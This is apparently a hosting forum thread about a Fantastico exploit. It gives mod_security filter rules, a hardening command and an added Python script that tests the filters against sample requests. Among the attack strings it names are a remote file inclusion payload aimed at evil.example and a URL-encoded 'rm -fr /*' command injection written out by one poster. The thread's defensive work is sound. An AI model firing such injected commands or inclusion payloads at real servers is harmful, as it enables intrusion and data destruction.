Full Version: WARNING! Fantastico is exploitable!
The Planet Forums > Control Panels > cPanel/WHM
eth00
http://www.netenberg.com/forum/viewtopic.php?t=3399

The basic exploit is that Fantastico has an update feature which is being exploited. It appears that people are having IRC processes run on their servers, which is the reason for the psybnc rule. It looks like Fantastico is going to try and step up their security; the current versions require chmod 777 on a lot of different files, which is what is causing some of these problems.



The following rules have been suggested in that thread:


SecFilter "arta.zip"
SecFilter "cmd=cdx20/var"
SecFilter "master_files"
SecFilter "HCL_path"
SecFilter "clamav-partial"
SecFilter "vi.recover"
SecFilter "netenberg"
SecFilter "pipe.php"
SecFilter "cse.gif"
SecFilter "psybnc"
SecFilter "fantastico_de_luxe"


I personally think they are a little too sensitive, since they look at the entire Apache request. I have modified/removed some of the rules to only look at the Apache POST requests. It appears that these rules should protect the servers for now. I would suggest everybody installs them into mod_security.


SecFilterSelective THE_REQUEST "arta.zip"
SecFilterSelective THE_REQUEST "cmd=cdx20/var"
SecFilterSelective THE_REQUEST "master_files"
SecFilterSelective THE_REQUEST "HCL_path=http"
SecFilterSelective THE_REQUEST "clamav-partial"
SecFilterSelective THE_REQUEST "vi.recover"
SecFilterSelective THE_REQUEST "netenberg"
SecFilterSelective THE_REQUEST "psybnc"
SecFilterSelective THE_REQUEST "fantastico_de_luxe"


I have also updated my guide at http://www.eth0.us/mod_security if you would like to install it. WHM Addon-modules also has support for it.


One further "fix" is to chattr the Fantastico files so that they cannot be modified between updates:

chattr -R +i /var/netenberg/fantastico_de_luxe/master_files

If you do this, you will have to do chattr -i in order to update Fantastico.
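As an added example (not code from the thread, from eth00's guide, or from Netenberg), here is a small Python script that replays the THE_REQUEST filters above against a few constructed request lines. It shows which rules fire, that the patterns are regular expressions matched after URL decoding (the mod_security 1.x request normalisation behaviour the script assumes), and one thing to keep in mind when choosing between the two rule forms: THE_REQUEST is only the request line (method, URI, protocol), so the same payload carried in a POST body is not seen by those rules, while the plain SecFilter form inspects the whole request. The hostnames, paths and request bodies are made up.

```python
"""Added example, not code from the thread or from eth00's mod_security guide:
replay the posted mod_security 1.x filters against constructed request lines
to see which rules fire, and to show what THE_REQUEST does and does not cover."""
import re
from urllib.parse import unquote

# The SecFilterSelective THE_REQUEST patterns from the post, verbatim.
THE_REQUEST_RULES = [
    "arta.zip",
    "cmd=cdx20/var",
    "master_files",
    "HCL_path=http",
    "clamav-partial",
    "vi.recover",
    "netenberg",
    "psybnc",
    "fantastico_de_luxe",
]


def normalize(text: str) -> str:
    """URL-decode before matching (assumed to mirror mod_security 1.x request
    normalisation) so HCL_path=http%3A%2F%2F... cannot slip past a literal
    'HCL_path=http' pattern."""
    return unquote(text)


def matching_rules(request_line: str, rules=THE_REQUEST_RULES) -> list:
    """Rules that a SecFilterSelective THE_REQUEST filter would fire on.

    THE_REQUEST is only the request line (method, URI and protocol), so a
    payload carried in a POST body is invisible to these rules.
    SecFilter patterns are regular expressions, so '.' in 'arta.zip' also
    matches 'artaXzip'; that is the semantics reproduced here.
    """
    line = normalize(request_line)
    return [r for r in rules if re.search(r, line)]


def matching_rules_anywhere(request_line: str, body: str = "",
                            rules=THE_REQUEST_RULES) -> list:
    """Approximates the plain SecFilter form, which inspects the whole request
    (request line plus body here; real mod_security also sees the headers)."""
    text = normalize(request_line) + "\n" + normalize(body)
    return [r for r in rules if re.search(r, text)]


# Constructed sample traffic (not captured from any real server).
SAMPLES = {
    "plain page": ("GET /about.html HTTP/1.1", ""),
    "exploit attempt in query string":
        ("GET /index.php?HCL_path=http%3A%2F%2Fevil.example%2Farta.zip HTTP/1.0", ""),
    "same payload in a POST body":
        ("POST /index.php HTTP/1.0", "HCL_path=http://evil.example/arta.zip"),
    "legitimate page that mentions psybnc":
        ("GET /blog/psybnc-vs-znc.html HTTP/1.1", ""),
}


def evaluate(samples=SAMPLES) -> dict:
    """Map each sample name to (THE_REQUEST hits, whole-request hits)."""
    return {
        name: (matching_rules(line), matching_rules_anywhere(line, body))
        for name, (line, body) in samples.items()
    }


if __name__ == "__main__":
    for name, (request_only, anywhere) in evaluate().items():
        print(f"{name}:")
        print(f"  THE_REQUEST rules fired  : {request_only}")
        print(f"  whole-request rules fired: {anywhere}")
```

The "legitimate page that mentions psybnc" sample is the false-positive case behind the "too sensitive" remark: a bare substring like psybnc or netenberg blocks any URL containing that word, not just the attack. The POST-body sample is the opposite trade-off: narrowing a rule to THE_REQUEST cuts false positives but also stops it from seeing form data, so decide per rule which risk you would rather carry.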
web1
Thanks. Glad I never installed it.

You may want to edit that to say "have to do chattr -R -i in order to update fantastico" so there's no confusion.

This one is funny: "cmd=cdx20/var". So who was the idiot programmer that thought it would be a good idea to let people execute shell commands from a URL?

If I get it right, I could also do "cmd=rmx20-frx20/*"

For those who don't read URLs, that is "rm -fr /*", or you could do something just as nasty and keep trying different things until the whole site or server is wiped out. I could easily load a short Perl program that does just about anything.

I think it would be safer to just remove this not-so-fantastic thing; you can't block all shell commands. I would be very careful of any program written by people who thought that shell-from-a-URL thing would be OK. You don't know what else is hiding in there.

This one doesn't make sense: "vi.recover". Are they trying to start vi over an HTTP connection? How does that work?
McDuck
The big question being...

WHY was nobody alerted the moment they knew this?
It's clear the makers of Fantastico have known this for some time.
eth00
QUOTE (McDuck)
The big question being...

WHY was nobody alerted the moment they knew this?
It's clear the makers of Fantastico have known this for some time.


Because Netenberg never notified any of the admins, including ev1 to my knowledge.
McDuck
That's pretty lame of Netenberg. They should have alerted all their customers the moment they knew about this. After all, it affects a huge number of servers.

A tip for ev1servers.net:

Don't install Fantastico on new boxes before this is resolved... it will just make the cleanup job even bigger.

For my part, Fantastico has been uninstalled on all my boxes :)
vivo2341
Thanks for the heads-up on this. I had no clue about this and just finished upgrading Fantastico myself. To be honest, I see Fantastico as a joke now, and if it were not for all the whining I would hear if I removed it, I think it would have been gone a long, long time ago.
NextGen
Where else could the mod_security rules be located on a cPanel server? They're not in httpd.conf, but when I check /etc/httpd/logs/audit_log I see it's actively protecting the system.

thanks
vivo2341
QUOTE (NextGen)
Where else could the mod_security rules be located on a cPanel server? They're not in httpd.conf, but when I check /etc/httpd/logs/audit_log I see it's actively protecting the system.

thanks


I think that is the only way. If you are doing a search for "mod_se" or something like that in pico, make sure you go to about the third find, because there are other instances in httpd.conf before it is even used.
NextGen
Well, I searched fully and the rules are not in there, but I found a file called mod-sec.conf which seems to have the rules. I guess it's using them from there.
eth00
QUOTE (NextGen)
Well, I searched fully and the rules are not in there, but I found a file called mod-sec.conf which seems to have the rules. I guess it's using them from there.


Yes, that is where cPanel installs the mod_sec rules. They can be placed anywhere in httpd.conf or in an Include file, as is the case for how cPanel installs mod_security.
eod
Wonderful as always. Thanks for the heads-up, eth00.
Invision Power Board © 2001-2009 Invision Power Services, Inc.